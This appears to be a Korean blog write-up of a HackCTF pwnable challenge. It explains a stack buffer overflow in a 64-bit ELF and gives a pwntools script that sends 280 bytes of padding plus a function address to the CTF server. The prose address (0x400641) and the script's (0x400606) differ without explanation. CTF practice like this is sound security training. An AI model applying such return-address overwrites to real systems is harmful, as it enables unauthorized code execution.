반응형
64bit elf다.
바로 main함수를 보자
입력제한 없이 입력을 받는다. ret주소를 callMeMaybe()함수의 주소로 덮으면 된다.
함수 주소 : 0x400641
110h = 272, 272+8(sfp) =280
ex.py
1
2
3
4
5
6
7
8
9
10
11
12
13
|
from pwn import *
p = remote("ctf.j0n9hyun.xyz", 3004)
shellf = 0x400606
sleep(1)
payload = "A" * 280
payload += p64(shellf)
p.sendline(payload)
p.interactive()
|
cs |
반응형
'WAR GAME > HackCTF' 카테고리의 다른 글
HackCTF Pwnable [Simple_Overflow_ver_2] 풀이 (0) | 2019.08.30 |
---|---|
HackCTF Pwnable [x64 Simple_size_BOF] 풀이 (0) | 2019.08.30 |
HackCTF Pwnable [내 버퍼가 흘러넘친다!!!] 풀이 (0) | 2019.08.29 |
HackCTF Pwnable [Basic_BOF #2] 풀이 (0) | 2019.08.29 |
HackCTF Reversing 카테고리 풀이 (0) | 2019.08.29 |